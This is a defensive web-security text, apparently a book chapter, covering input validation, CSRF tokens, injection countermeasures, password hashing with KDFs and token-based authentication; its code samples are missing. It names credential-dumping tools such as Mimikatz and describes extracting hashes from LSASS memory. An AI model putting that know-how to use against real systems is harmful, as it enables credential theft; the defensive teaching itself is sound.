With applications becoming more interconnected, attacks being buried in user input and decoded and/or executed by a downstream interpreter is common. Input validation, that is restricting user input to allow only certain white listed characters and restricting field lengths are only two forms of defence. Any decent attacker can get around client side validation, so you need to employ defence in depth. If you need to validate, filter and sanitise, at the very least, it needs to be done on the server side.
System.Net.WebUtility from the
System.Web.dll assembly to do most of what we needed other than provide us with fine grained information of what had been tampered with. So I took it and extended it slightly. We had not employed AOP at this stage, so there was some copy past modifying.
First up, the exceptions we used:
And the more specific
Now we defined whether our requirements were satisfied by way of executable requirements (unit tests(in their rawest form)):
Now the code that satisfies the above executable specifications, and more:
To drive the development of the
Sanitisation API, we wrote the following tests. We created a
MockedOperationContext, code not included here. We also used RhinoMocks as our mocking framework which is no longer being maintained. I would recommend NSubstitute instead if you were looking for a mocking framework for .NET. We also used NLog and wrapped it in
And finally the API code we used to perform the sanitisation:
As you can see, there is a lot more work on the server side than the client side.
For the next example we use a single page app. Switching to
jQuery.validator on the client side and
express-form on the server side. Our example is a simple contact form. I have only shown the parts relevant to validation and filtering.
Once the jQuery plugin (which is a module)
validate is loaded, jQuery is passed to it. The plugin extends the jQuery prototype with its
validate method. Our contact.js script then loads in the browser. We then call
ContactForm.initContactForm();. ContactForm is immediately invoked and returns an object, of which we call
We add a custom validation function to our
validator by way of
addMethod. This function will take the value being tested, the element itself and a regular expression to test against. You can see we use this function when we pass our rules within the
options object to
validate which internally passes them to its
validate documentation explains the sequence of events that your custom rules will be applied in.
submitHandlerwhich is bound to the native
There are many other options you can provide. I think the code is fairly self explanatory:
Shifting our attention to the server side now. First up we have got the home route of the single page app. Within the home route, we have also got the
/contact route which uses the
express-form middleware. You can see the middleware first in action on line 82.
Following is the routing module that loads all other routes
Now our entry point into the application. We load routes on line 30.
As I mentioned previously in the “What is Validation” section, some of the libraries seem confused about the differences between the practises of validation, filtering and sanitisation. For example
express-form has sanitisation functions that are under their “Filter API”.
entityDecode, even the Type Coercion functions are actually sanitisation rather than filtering.
Maybe it is semantics, but
ifNull are sanitisation functions.
trim, … is filtering, but
toLower, … is sanitisation again. These functions listed in the documentation under the Filter API should be in their specific sections.
Refer to the section above for a refresher on validation, filtering and sanitisation if you need it.
This is a place holder section. The countermeasures are covered in the Lack of Input Validation, Filtering and Sanitisation section.
CSRF syncroniser/challenge tokens are one approach commonly used to help defend against CSRF. This approach should also be used with other techniques like Identifying the source origin by checking the Origin and Referer headers, along with other useful techniques that have been well documented by the OWASP CSRF Prevention Cheat Sheet. Also the OWASP CSRF page has links to many useful resources, and do not forget to check the Additional Resources chapter.
With the CSRF syncroniser/challenge token pattern, a token (often called the CSRF syncroniser/challenge token) is sent as part of a response to a legitimate request from a client browser. The application on the client side holds this syncroniser/challenge token and sends it on subsequent requests to the legitimate website.
The specific server side web application is responsible for generating a unique token per session and adding it to the responses. The application in the browser, or users device, is responsible for storing the syncroniser/challenge token, then issuing it with each request where CSRF is a concern.
When an attacker tricks a target into issuing a fraudulent request to the same website, the request has no knowledge of the syncroniser/challenge token, so it is not sent.
The legitimate website will only regard a request as being legitimate if the request also carries the valid matching syncroniser/challenge token as is contained in the targets session on the server.
For the examples from the Identify Risks section:
The NodeGoat application deals with CSRF attacks by using an Express CSRF middleware named
_csrf which should be added to all requests that mutate state such as discussed in the Identify Risks section. You can see this on line 67 of the profile.html snippet in the Identify Risks section within a hidden field. Repeated below:
When the form is submitted, the middleware checks for existence of the token, and validates it by matching to the generated token in the targets session. If the CSRF syncroniser/challenge token fails validation, the server rejects the requested action.
To enable this CSRF middleware, simply uncomment the CSRF fix in the NodeGoat server.js file. The CSRF middleware is initialised immediately after the applications session middleware is initialised,
You can see and play with all this at https://nodegoat.herokuapp.com/tutorial/
Also check the “Securing Sessions” countermeasures section along with the “Lack of Authentication, Authorisation and Session Management” Risks that Solution Causes section for pertinent information.
Other techniques such as requiring the user to reauthenticate, or even providing CAPTCHA’s are often used, although I am not a fan of those techniques. I fail to see why we as developers should make our problem the users. We just need to make sure we make it hard enough for the attackers that the end user is not affected.
As an end user, if you make sure you invalidate your authentication by logging out or deleting your session cookies when you finish working with a website that requires authentication or move away from the browser, then the browser will be unable to send authentication as part of a CSRF attack.
Usually the most effective technique for determining if/where your application is vulnerable to injection attacks is to review your code for all calls out to external resources, including interpreters, and determine whether the data you are passing is untrusted.
If you can avoid external interpreters altogether, then they can no longer be tricked into executing untrusted data, whether directly or indirectly from untrusted actors or even stored.
Use a parametrised API for the specific technology you are working with, whether it be SQL, NoSQL, execution of Operating System commands, XML, XPath, XSLT, XQuery, LDAP, etc.
Similarly to the Lack of Input Validation, Filtering and Sanitisation section, validation, filtering, sanitisation, and constraining all untrusted data to well structured semantic types is also necessary. Granularly isolating and semantic typing each piece of untrusted data from the command or query allows you to tightly define constraints on what you expect each specific piece of data to conform to.
Keep the principle of least privilege in mind and implementation. When any attacks are successful, how much damage can they currently do? By enforcing the least amount of privileges possible for the given operation, you are minimising the possible risk.
Make sure the feedback and error messages that are provided on invalid input only provide the necessary detail that the user needs in order to provide correct input. Don’t provide unnecessary details on internal workings: exceptions, stack traces, etc. Make sure you capture and handle internal errors in software, rather than letting them bubble to the user interface.
There are a few options here:
exec()within stored procedures can be prone to SQLi exploitation
There are plenty of easy to find and understand resources on the inter-webs around SQLi mitigations and the countermeasures are generally very easy to implement. So now you have no excuse.
Take the advice from the generic Injection section.
For any dynamic queries, rather than piecing together strings with unvalidated user input, use prepared statements with strongly defined semantic types allowing you to use as short as possible white list of allowed characters, then follow up with filtering and sanitisation of any characters that must be allowed through.
Queries can be formatted in many different types of conventions depending on the type of NoSQL data store, such as XML, JSON, LINQ, etc. As well as these execution contexts, there will also be the execution contexts of the application itself before the untrusted data reaches the particular type of NoSQL data store API. This means, as discussed in the “What is Sanitisation” section of the Lack of Input Validation, Filtering and Sanitisation section of Identify Risks, you must validate, filter and sanitise based on all of the execution contexts that the untrusted data may pass through. With NoSQL this is usually far more tedious.
Countermeasures will need to be carefully thought about once the type of NoSQL data store syntax, data model, and programming language(s) used throughout the application are thoroughly understood.
Ideally the NoSQL client library you decide to use will provide the logic to perform validation on characters that are dangerous in the execution context of the NoSQL library, it may also provide some filtering, but you will often have to provide some configuration to help it know what you want. Ideally the NoSQL client library will also provide sanitisation for its own execution context. As discussed above, you will still need to define your own semantic types, white lists for the semantic types, filtering and sanitisation for your application specific execution contexts that the NoSQL client library has no knowledge of.
In regards to MongoDB (one of the 225 + types of NoSQL data stores):
--noscripting option on the command line or setting
$where property value.
So in essence, make sure you read and understand your NoSQL data store documentation before building your queries.
On top of the points mentioned above under Lack of Input Validation, Filtering and Sanitisation, your greatest defence is to think through the path of where untrusted data flows, carefully considering each execution context you encounter.
Untrusted data should never be inserted to
setInterval or as the last argument to
Function without properly validating, filtering, and sanitising if required. It is generally not good practise to use the
Function constructor anyway. I have written about this on several occasions.
The NodeGoat Web Application also provides a very minimal countermeasure example
First of all, as discussed in the generic Injection section above, your application should validate, filter and sanitise all untrusted data before incorporating it into an XML document. If you can:
Use local static: Document Type Definitions (DTDs) or better, XML Schemas. This will mitigate XXE attacks.
If the XML parser you are using is vulnerable to XXE attacks by default, investigate disabling the XML parsers ability to follow all external resource inclusions, often available by flags. If the ability to disable the following of external resource inclusions is not available, consider using an alternative library. Failing that, make sure your untrusted data is validated, filtered and sanitised by a secure parser before passing to the defective parser.
OWASP also has an XML External Entity (XXE) Prevention Cheat Sheet that is quite useful.
All mitigations discussed and explored in the excellent paper by Emanuel Duss and Roland Bischofberger presented at an OWASP Switzerland meeting.
Follow the precautions discussed in the generic Injection countermeasures section, when handling dynamically constructed queries. A little validation of untrusted data will go a long way. For example, the username should only contain alphanumeric characters, filtering to a maximum length sometimes helps. In the case of usernames, because we have created a semantic type, it is easy to apply the white list of allowed characters to the untrusted data before inserting to your XPath query. In regards to the password, it should be the result of the untrusted user input password once processed by your Key Derivation Function (KDF), only then should it be inserted to your XPath query.
By performing some simple validation, the attacker is no longer able to escape the quotes and modify the intended logic of the query.
Try to use a language library that supports parameterised queries. If the language you are coding in does not have any support or libraries available that have a parameterised XPath interface, you will need to sanitise the untrusted data being inserted to any dynamically constructed queries. What ever type of quote you are using to delimit the untrusted input, you need to sanitise the same type of quote with the XML encoded derivative, I discussed this in the Sanitisation using escaping code sample in the Types of Escaping section of Countermeasures. The OWASP XPath Injection Defences also provides some coverage on this.
Also check the Additional Resources chapter for both identifying risks and countermeasures in regards to XPath injection.
Because XQuery is a superset of XPath with the SQL-like FLWOR expression abilities, it enjoys the same countermeasures as XPath and SQLi.
The same generic injection countermeasures as well as many of the more specific that we have already discussed, are applicable to LDAP also.
As part of your validation, define your semantic types for each dynamic section, this will help you define what is accepted as the white list of allowed characters for each untrusted section. If you can tightly constrain what is an allowable character for your given semantic types, then this alone in many cases (such as a username where you would only allow alphanumeric characters for example) will stop any potential characters being able to break out of the intended context and change the logic of the LDAP query. This is why we always put the validation -> filtering -> sanitisation in this order, because often the first step will catch everything.
For each semantic type of untrusted data, for any characters that pass the white list validation, define filters, and sanitise all of the following validated characters:
with their unicode hexidesimal number, such as
comma: \2C, back slash: \5C
Respect and implement the principle of least privilege as discussed in the generic injection countermeasures. Do not use administrative bind accounts in your execution environment, and apply the least privileges to the domain user service account.
The framework and/or libraries you use to interact with LDAP servers should sanitise untrusted data and not allow application code to directly interact with LDAP servers.
recaptcha uses this technique. See below for details.
Uses images which users have to perform certain operations on, like dragging them to another image. For example: “Please drag all cat images to the cat mat.”, or “Please select all images of things that dogs eat.” sweetcaptcha is an example of this type of captcha. This type completely rules out the visually impaired users.
Pioneered by… you guessed it. Facebook. This type of captcha focusses on human hackers, the idea being that they will not know who your friends are.
“Instead of showing you a traditional captcha on Facebook, one of the ways we may help verify your identity is through social authentication. We will show you a few pictures of your friends and ask you to name the person in those photos. Hackers halfway across the world might know your password, but they don’t know who your friends are.”
I disagree with that statement. A determined hacker will usually be able to find out who your friends are. There is another problem, do you know who all of your friends are? Every acquaintance? I am terrible with names and so are many people. This is supposed to be used to authenticate you. So you have to be able to answer the questions before you can log in.
This is what textcaptcha uses. Simple logic questions designed for the intelligence of a seven year old child. These are more accessible than image and textual image recognition, but they can take longer than image recognition to answer, unless the user is visually impared. The questions are usually language specific also, usually targeting the English language.
This is a little like image recognition. Users have to perform actions that virtual intelligence can not work out… yet. Like dragging a slider a certain number of notches.
If an offering gets popular, creating some code to perform the action may not be that hard and would definitely be worth the effort for bot creators.
This is obviously not going to work for the visually impaired or for people with handicapped motor skills.
In NPM land, as usual there are many options to choose from. The following were the offerings I evaluated. None of which really felt like a good fit:
After some additional research I worked out why the above types and offerings didn’t feel like a good fit. It pretty much came down to user experience. Why should genuine users/customers of your web application be disadvantaged by having to jump through hoops because you have decided you want to stop bots spamming you? Would it not make more sense to make life harder for the bots rather than for your genuine users?
The above solutions are excellent targets for creating exploits that will have a large pay off due to the fact that so many websites are using them. There are exploits discovered for these services regularly.
“Given the fact that many clients count on conversions to make money, not receiving 3.2% of those conversions could put a dent in sales. Personally, I would rather sort through a few SPAM conversions instead of losing out on possible income.”
Casey Henry: Captchas’ Effect on Conversion Rates
“Spam is not the user’s problem; it is the problem of the business that is providing the website. It is arrogant and lazy to try and push the problem onto a website’s visitors.”
Tim Kadlec: Death to Captchas
Recording how long it takes from fetch to submit. This is another technique, in which the time is measured from fetch to submit. For example if the time span is under five seconds it is more than likely a bot, so handle the message accordingly.
Spamming bots operating on custom mechanisms will in most cases just try, then move on. If you decide to use one of the common offerings from above, exploits will be more common, depending on how wide spread the offering is. This is one of the cases where going custom is a better option. Worse case is you get some spam and you can modify your technique, but you get to keep things simple, tailored to your web application, your users needs, no external dependencies and no monthly fees. This is also the simplest technique and requires very little work to implement.
So what we do is create a field that is not visible to humans and is supposed to be kept empty. On the server once the form is submitted, we check that it is still empty. If it is not, then we assume a bot has been at it.
This is so simple, does not get in the way of your users, yet very effective at filtering bot spam.
This is also shown above in a larger example in the Lack of Input Validation, Filtering and Sanitisation section. I show the validation code middle ware of the route on line 28 below. The validation is performed on line 14
So as you can see, a very simple solution. You could even consider combining the above two techniques.
Check out the “Testing for Captcha (OWASP-AT-008” in v3 of the OWASP Testing Guide for summary and description of the issue and testing examples. The Offensive Web Testing Framework (OWTF) also has a plugin for it.
Secure password management within applications is a case of doing what you can, often relying on obscurity and leaning on other layers of defence to make it harder for compromise. Like many of the layers already discussed in the previous chapters. Review the Storage of Secrets subsections in the Cloud chapter for some ideas and tooling options to help with this.
Find out how secret the data that is supposed to be secret that is being sent over the network actually is and consider your internal network just as malicious as the internet. Then you will be starting to get the idea of what defence in depth is about. That way when one defence breaks down, you will still be in good standing.
You may read in many places that having data-store passwords and other types of secrets in configuration files in clear text is an insecurity that must be addressed. Then when it comes to mitigation, there seems to be a few techniques for helping, but most of them are based around obscuring the secret rather than securing it. Essentially just making discovery a little more inconvenient like using an alternative port to SSH to other than the default of 22. Maybe surprisingly though, obscurity does significantly reduce the number of opportunistic type attacks from bots and script kiddies.
Do not hard code passwords in source files for all developers to see. Doing so also means the code has to be patched when services are breached. At the very least, store them in configuration files and use different configuration files for different deployments and consider keeping them out of source control.
Here are some examples using the node-config module.
is a fully featured, well maintained configuration package that I have used on a good number of projects.
To install: From the command line within the root directory of your NodeJS application, run:
npm install node-config --save
Now you are ready to start using node-config. An example of the relevant section of an
app.js file may look like the following:
Where ever you use node-config, in your routes for example:
A good collection of different formats can be used for the config files:
There is a specific file loading order which you specify by file naming convention, which provides a lot of flexibility and which caters for:
$NODE_ENVenvironment variable to for example:
local. These files are to be managed by external configuration management tools, build scripts, etc. Thus providing even more flexibility about where your sensitive configuration values come from.
The config files for the required attributes used above may take the following directory structure:
The contents of the above example configuration files may look like the following:
The Logging section shows more configuration options to provide a slightly bigger picture.
Encrypting/decrypting credentials in code may provide some obscurity, but not much more than that.
There are different answers for different platforms. None of which provide complete security, if there is such a thing, but instead focusing on different levels of obscurity.
Store database credentials as a Local Security Authority (LSA) secret and create a DSN with the stored credential. Use a SqlServer connection string with
The hashed credentials are stored in the SAM file and the registry. If an attacker has physical access to the storage, they can easily copy the hashes if the machine is not running or can be shut-down. The hashes can be sniffed from the wire in transit. The hashes can be pulled from the running machines memory (specifically the Local Security Authority Subsystem Service (
LSASS.exe)) using tools such as Mimikatz, WCE, Metasploits hashdump or fgdump.
NTDS.dit database file, along with the DBLayer that is running inside the NTDSAI.DLL (DSA), is directly managed by the Extensible Storage Engine (ESE), which tries to read as much as possible into the
Encrypt sections of a web, executable, machine-level, application-level configuration files with
aspnet_regiis.exe with the
-pe option and name of the configuration element to encrypt and the configuration provider you want to use. Either
DataProtectionConfigurationProvider (uses DPAPI) or
RSAProtectedConfigurationProvider (uses RSA). the
-pd switch is used to decrypt or programatically:
string connStr = ConfigurationManager.ConnectionString["MyDbConn1"].ToString();
Of course there is a problem with this also. DPAPI uses LSASS, which again an attacker can extract the hash from its memory. If the
RSAProtectedConfigurationProvider has been used, a key container is required. Mimikatz will force an export from the key container to a
Which can then be read using OpenSSL or tools from the
I have looked at a few other ways using
SecureString. They all seem to rely on DPAPI which as mentioned uses LSASS which is open for exploitation.
Credential Guard and Device Guard leverage virtualisation-based security. By the look of it still using LSASS. Bromium have partnered with Microsoft and coined it Micro-virtualization. The idea is that every user task is isolated into its own micro-VM. There seems to be some confusion as to how this is any better. Tasks still need to communicate outside of their VM, so what is to stop malicious code doing the same? I have seen lots of questions but no compelling answers yet. Credential Guard must run on physical hardware directly. Can not run on virtual machines. This alone rules out many deployments.
“Bromium vSentry transforms information and infrastructure protection with a revolutionary new architecture that isolates and defeats advanced threats targeting the endpoint through web, email and documents”
“vSentry protects desktops without requiring patches or updates, defeating and automatically discarding all known and unknown malware, and eliminating the need for costly remediation.”
This is marketing talk. Please don’t take this literally.
“vSentry empowers users to access whatever information they need from any network, application or website, without risk to the enterprise”
“Traditional security solutions rely on detection and often fail to block targeted attacks which use unknown “zero day” exploits. Bromium uses hardware enforced isolation to stop even “undetectable” attacks without disrupting the user.”
“With Bromium micro-virtualization, we now have an answer: A desktop that is utterly secure and a joy to use”
These seem like bold claims.
Also worth considering is that Microsofts new virtualization-based security also relies on UEFI Secure Boot, which has been proven insecure.
Containers also help to provide some form of isolation. Allowing you to only have the user accounts to do what is necessary for the application.
I usually use a deployment tool that also changes the permissions and ownership of the files involved with the running web application to a single system user, so unprivileged users can not access the web applications files at all. The deployment script is executed over SSH in a remote shell. Only specific commands on the server are allowed to run and a very limited set of users have any sort of access to the machine. If you are using Linux or Docker Containers then you can reduce this even more if it is not already.
One of the beauties of GNU/Linux is that you can have as much or little security as you decide. No one has made that decision for you already and locked you out of the source. You are not feed lies like all of the closed source OS vendors trying to pimp their latest money spinning product. GNU/Linux is a dirty little secrete that requires no marketing hype. It just provides complete control if you want it. If you do not know what you want, then someone else will probably take that control from you. It is just a matter of time if it hasn’t happened already.
An application should have the least privileges possible in order to carry out what it needs to do. Consider creating accounts for each trust distinction. For example where you only need to read from a data store, then create that connection with a users credentials that is only allowed to read, and so on for other privileges. This way the attack surface is minimised. Adhering to the principle of least privilege. Also consider removing table access completely from the application and only provide permissions to the application to run stored queries. This way if/when an attacker is able to compromise the machine and retrieve the password for an action on the data-store, they will not be able to do a lot anyway.
Put your services like data-stores on network segments that are as sheltered as possible and only contain similar services.
Maintain as few user accounts on the servers in question as possible and with the least privileges as possible.
As part of your defence in depth strategy, you should expect that your data-store is going to get stolen, but hope that it does not. What assets within the data-store are sensitive? How are you going to stop an attacker that has gained access to the data-store from making sense of the sensitive data?
As part of developing the application that uses the data-store, a strategy also needs to be developed and implemented to carry on business as usual when this happens. For example, when your detection mechanisms realise that someone unauthorised has been on the machine(s) that host your data-store, as well as the usual alerts being fired off to the people that are going to investigate and audit, your application should take some automatic measures like:
If you follow the recommendations below, data-store theft alone will be an inconvenience, but not a disaster.
Consider what sensitive information you really need to store. Consider using the following key derivation functions (KDFs) for all sensitive data. Not just passwords. Also continue to remind your customers to always use unique passwords that are made up of alphanumeric, upper-case, lower-case and special characters. It is also worth considering pushing the use of high quality password vaults. Do not limit password lengths. Encourage long passwords.
PBKDF2, bcrypt and scrypt are KDFs that are designed to be slow. Used in a process commonly known as key stretching. The process of key stretching in terms of how long it takes can be tuned by increasing or decreasing the number of cycles used. Often 1000 cycles or more for passwords. “The function used to protect stored credentials should balance attacker and defender verification. The defender needs an acceptable response time for verification of users’ credentials during peak use. However, the time required to map
<credential> -> <protected form> must remain beyond threats’ hardware (GPU, FPGA) and technique (dictionary-based, brute force, etc) capabilities.”
OWASP Password Storage
PBKDF2, bcrypt and the newer scrypt, apply a Pseudorandom Function (PRF) such as a cryptographic hash, cipher or keyed-Hash Message Authentication Code (HMAC) to the data being received along with a unique salt. The salt should be stored with the hashed data.
Do not use MD5, SHA-1 or the SHA-2 family of cryptographic one-way hashing functions by themselves for cryptographic purposes like hashing your sensitive data. In-fact do not use hashing functions at all for this unless they are leveraged with one of the mentioned KDFs. Why? Because they were not designed for passwords (to be slow), the hashing speed can not be slowed as hardware continues to get faster. Many organisations that have had their data-stores stolen and continue to on a weekly basis could avoid their secrets being compromised simply by using a decent KDF with salt and a decent number of iterations. “Using four AMD Radeon HD6990 graphics cards, I am able to make about 15.5 billion guesses per second using the SHA-1 algorithm.”
In saying that, PBKDF2 can use MD5, SHA-1 and the SHA-2 family of hashing functions. Bcrypt uses the Blowfish (more specifically the Eksblowfish) cipher. Scrypt does not have user replaceable parts like PBKDF2. The PRF can not be changed from SHA-256 to something else.
This depends on many considerations. I am not going to tell you which is best, because there is no best. Which to use depends on many things. You should gain understanding into at least all three of the following best of breed KDFs often used for password hashing.
PBKDF2 is the oldest so it is the most battle tested, but there has also been lessons learnt from it that have been taken to the latter two, like the fact that its utilised hashing functions (MD5, SHA) are CPU intensive only and easily parallelised on GPUs and Application Specific Integrated Circuts, using very little RAM, we see this in crypto-currency mining.
The next oldest is bcrypt which uses the Eksblowfish cipher, which was designed specifically for bcrypt from the blowfish cipher, to be very slow to initiate thus boosting protection against dictionary attacks which were often run on custom Application-specific Integrated Circuits (ASICs) with low gate counts, often found in GPUs of the day (1999).
The hashing functions that PBKDF2 uses were a lot easier to get speed increases on GPUs due to ease of parallelisation as opposed to the Eksblowfish cipher attributes such as:
GPUs are good at carrying out the exact same instruction set concurrently, but when a branch in the logic occurs (which is how the blowfish algorithm works) on one of the sets, all others stop thus destroying parallelisation on GPUs.
The Arithmetic Logic Units (ALUs), or shaders of a GPU are partitioned into groups, and each group of ALUs shares management, so members of the group cannot be made to work on separate tasks. They can either all work on nearly identical variations of one single task, in perfect sync with one another, or nothing at all.
Bcrypt was specifically designed to be non GPU friendly, this is why it used the existing blowfish cipher.
Now with hardware utilising large Field-programmable Gate Arrays (FPGAs), bcrypt brute-forcing is becoming more accessible due to easily obtainable cheap hardware such as the Xeon+FPGA. We also have the likes of the Xeon Phi which has 60 1GHz cores (- several used by the system), each with 4 hardware threads. The Phi is pretty close to being a general purpose, many core CPU. The FPGAs are not easy to programme for and neither is the Xeon Phi, as it has its own embedded Linux SOC which runs BusyBox, that you need to SSH into. The following board and chip are also worth considering, although you won’t get the brute-forcing throughput of the Xeon+FPGA or Phi:
Scrypt uses PBKDF2-HMAC-SHA-256 (PBKDF2 of HMAC-SHA256) as its PRF, and the Salsa20/8 core function, which is not a cryptographic hash function as it is not collision resistant, to help make pseudo-random writes to RAM, then repeatedly read them in a pseudo-random sequence, FPGAs do not generally have a lot of RAM, so this makes leveraging both FPGAs and GPUs a lot less feasible, thus narrowing down the field of potential hardware cracking options to many core multi-purpose CPUs, such as the Xeon Phi, ZedBoard, Haswell and others.
The sensitive data stored within a data-store should be the output of using one of the three key derivation functions we have just discussed. Feed with the data you want protected and a unique salt. All good frameworks will have at least PBKDF2 and bcrypt APIs.
Possibly also worth considering if you like the bleeding edge, is the new Argon2.
Logging out from an application obviously does not clear the browser cache of any sensitive information that might have been stored. Test that any sensitive data responses have
Expires headers set appropriately.
Use an HTTP intercepting proxy such as ZAP, Burp, etc, to search through the server responses that belong to the session, checking that the server instructed the browser not to cache any data for all responses containing sensitive information.
Use the following headers on such responses:
Cache-Control: no-cache, no-store
Expires: 0, or past date
You can also add the following flags to the
Cache-Control header in order to better prevent persistently linked files on the filesystem:
To check that the browsers are respecting the headers, check the cache stores. For example:
For Mozilla Firefox:
C:\Documents and Settings\<user_name>\Local Settings\Application Data\
For Internet Explorer:
C:\Documents and Settings\<user_name>\Local Settings\Temporary Internet Files>
Don’t forget to plug all your changes into your Zap Regression Test suite as discussed in the Process and Practises chapter of Fascicle 0.
Slowing down and rendering cracking infeasible is addressed by the type of KDF and number of rounds you configure. We dealt with this in the “Which KDF to use” section.
I’m going to walk you through some of the important parts of what a possible authentication and authorisation solution might look like that will address the points raised in the Identify Risks section from above.
The following code is one example of how we can establish authentication and authorisation of individuals desiring to work with a system comprised of any number of front-ends (web, mobile, etc), a service layer API that provides an abstraction to, and communicates with the underlying back-end micro-services. The example uses the Resource Owner Password Credentials (ROPC) flow which is quite a common flow with todays front-end -> service API -> back-end micro-service architectures.
It’s also worth checking out the following sections in the OAuth 2.0 specification around the ROPC flow:
We’ll also discuss integrating external identity providers (The Facebooks, Twitters and Googles) of our world.
Getting to grips with and understanding enough to create a solution like this can be quite a steep learning experience. The folks from IdentityServer which do this for the love of it have created an outstanding Open Source Software (OSS) project and in all my dealings with them have always gone out of their way to help. In all the projects I’ve worked on, with all the edge cases, there has always been a way to create the solution that satisfied the requirements.
Ideally reference access tokens should be used between front-end(s) and the service layer, which they are in this case. Then JWT, which contains a signed list of the users claims, from the service layer to the back-end micro-services.
JWTs can not be revoked as they are self contained (contain everything about a user that is necessary to make a decision about what the user should be authorised to access)
Reference tokens on the other hand simply contain a reference to the user account which is managed by identity server via MembershipReboot in this case. Thus enabling revocation (logging out of the user for example).
Identity server does not currently support both types of token at once, being able to switch between one or the other (reference for front-end, JWT for back-end), although it is on the road map. Until this configuration is supported, the service layer can get the users claims by using the reference token. One of those claims being the user GUID. The claims could then be propagated to the micro-services.
IdentityServer2 was focussed around authentication with some OAuth2 support to assist with authentication.
AuthorizationServer was more focused on OAuth2 for delegated authorisation.
IdentityServer3 is a C#.NET library that focusses on both authentication and authorisation. You don’t have to have your surrounding out of process components (service layer, micro-services) in .NET for IdentityServer3 to be a viable option. They could be written in another language, so long as they speak HTTP.
Is a user identity management library with a similar name to the ASP.NET Membership Provider, inspired by it due to frustrations that Brock Allen (MembershipReboot creator) had from it such as:
AccountLockoutFailedLoginAttemptsand the much needed
MembershipRebootConfigurationclass which does what you expect it to do.
Some note worthy benefits I’ve found with MembershipReboot are:
Where as going down the path of MembershipReboot and IdentityServer3.MembershipReboot which is a “User Service plugin for IdentityServer v3 that uses MembershipReboot as its identity management library. In other words, you’re using IdentityServer v3 and you want to use MembershipReboot as your database for user passwords…” provides the ability to customise, out of the box. All you need to do is add the properties you require to the already provided
CustomUser and the data store schema which is also provided in an Entity Framework project that comes with MembershipReboot.
MembershipRebootConfigurationclass to dial in the number of iterations (stretching), as seen below on line 29. This provides us with what’s known as an adaptive one-way function. Adaptive because the workload increases each year to keep up with advances in hardware technology. You now have control of how slow you want it to be to crack those passwords. What’s more, the iteration count can be set to change each year automatically. If the developer chooses not to touch the iteration count at all (or more likely, forgets), then the default of 0 is inferred. 0 means to automatically calculate the number based on the OWASP recommendations for the current year. In the year 2000 it should be 1000 iterations. The count should be doubled each subsequent two years, so in 2016 we should be using 256000 iterations and that’s what MembershipReboot does if the setting is not changed.
The iteration count of each users password is stored with the hashed password, as can be seen above on lines 36 and 38. This means each password can have a different number of iterations applied over time as required. Beautifully thought out!
With the ASP.NET Membership Provider you can have salted SHA1 which as already mentioned was not designed for what it was chosen to be used for in this case and there doesn’t appear to be any thought to (Moore’s Law) the fact that machines keep getting faster. MD5 and SHA were designed to be fast, not slow and able to be slowed down. So storing passwords by SHA-1 hashing means they are incredibly fast to crack.
Sadly the next offering in this space (ASP.NET Identity) that Microsoft produced also seems inferior. Brock Allen blogged about some of the short comings in his post titled “The good, the bad and the ugly of ASP.NET Identity” in which MembershipReboot caters for, such as the following:
Microsoft Katana provides support for
There are also many other community provided OWIN OAuth middleware providers
The OWIN startup or config file could look like the following. You can see in the second half of the code file is the configuration of the external identity providers:
MembershipReboot supports adding secret questions and answers along with the ability to update user account details. Details on how this can be done is in the sample code kindly provided by Brock Allen and documentation on their github wiki.
Using local storage means there is less to be concerned about in terms of protecting the token than with using cookies. LocalStorag is only concerned with XSS, where as cookies are susceptible to both CSRF and XSS attacks (although XSS to a lesser degree). If you decided to use local storage, You’re anti XSS strategy needs to be water-tight.
Even with the
HttpOnly flag set on your cookie, it is possible to compromise the cookie contents if the values of the
Path cookie attributes are too permissive. For example if you have the
Domain value set to
.localtest.me, an attacker can attempt to launch attacks on the cookie token between other hosts with the same domain name. Some of these hosts may contain vulnerabilities, thus increasing the attack surface.
Secure attribute on the cookie. This instructs web browsers to only send the cookie over a TLS (HTTPS) connection, thus removing this MItM attack vector.
You can and should test this by inspecting the headers with an HTTP intercepting proxy. While you’re at it, you may as well add this as a test to your Zap Regression Test suite as discussed in the Process and Practises chapter of Fascicle 0.
Secure flag must also be enabled as mentioned above, in order to mitigate Session Id theft.
CSRF is the most common attack used to leverage cookies containing authentication details. In order to mitigate this attack vector, the use of the synchroniser token pattern is recommended. Each server side technology will implement this type of protection differently. CSRF is discussed in more depth in the Cross-Site Request Forgery (CSRF) sections.
As for the
Max-Age cookie attributes from
client\ServiceLayer\APIControllers\SecureController.cs (seen above), these will need to be set to the maximum values that the business is prepared to accept along with the
backend\Auth\AuthService.WebApi\IdSvr\Clients.cs (seen above) (which need to line up) for the IdentityServer.
The OWASP Session Management Cheat Sheet has more details around securing cookies.
There are fundamental principles that we need to examine, understand and embrace before we dive into some details.
The attackers will always target the easiest to compromise point of any given encryption protocol.
Cryptography is one small ingredient that may go into creating a system that is aiming to be secure to a degree. Usually it’s just easier to step around or by-pass any crypto. So think of crypto as one defence. Unless all of your other areas of security are better than your crypto solutions, then an attacker will more than likely be targeting the other weaker areas.
Has been implemented across browser vendors now.
The browser is insecure and should never be trusted. HTML5 has added a lot of extra attack surface without adding much in the way of security.
From the W3C Web Cryptography API
Relying on the Web Cryptography API as opposed to using low-level primitives provides a slightly better and more secure starting point. Why it’s only slightly better is discussed in the Risks that Solution Causes section.
In order, from the lower level to higher level, the following Web Crypto API concepts need to be understood:
“The specification assumes, but does not require, that conforming user agents do not and will not be directly implementing cryptographic operations within the user agent itself” Often user agents will defer cryptographic operations to existing APIs available as part of the underlying operating system or to third-party modules not directly managed by the user agent. As you can see, the responsibility doesn’t belong to the server, but rather to the client or more specifically the end user.
Internal slots and methods in the ECMA-262 (3, 5 and 6) standards are usually represented within “
]]” in the ECMA-262 specifications. Internal slots and methods are pseudo-properties/pseudo-methods that the specification uses to define required state (for internal slots), behaviour (for internal methods). Internal slots and methods are hidden from user code, never exposed to applications. They may or may not correspond to properties of objects used by the engine and/or exposed via the implementation of the public API. The internal slot named
[[handle]], just as all other internal slots and methods, represents an opaque, implementation specific type. The
CryptoKey(Web API interface)
“The CryptoKey object represents an opaque reference to keying material that is managed by the user agent”
CryptoKey object can be obtained by using
SubtleCrypto.importKey(). See below for details on
Check the specification for further details.
Crypto(Web API interface)
Crypto interface was implemented in some browsers without it being well defined or cryptographically sound. Browsers implementing the Web Crypto API have removed the
Crypto methods and properties other than
Crypto.subtle which provides access to the below
SubtleCrypto interface, which provides all of the Web Crypto API methods.
Check the specification for further details.
SubtleCrypto(Web API interface)
SubtleCrypto provides all the methods to work with the Web Crypto API.
Check the specification for further details.
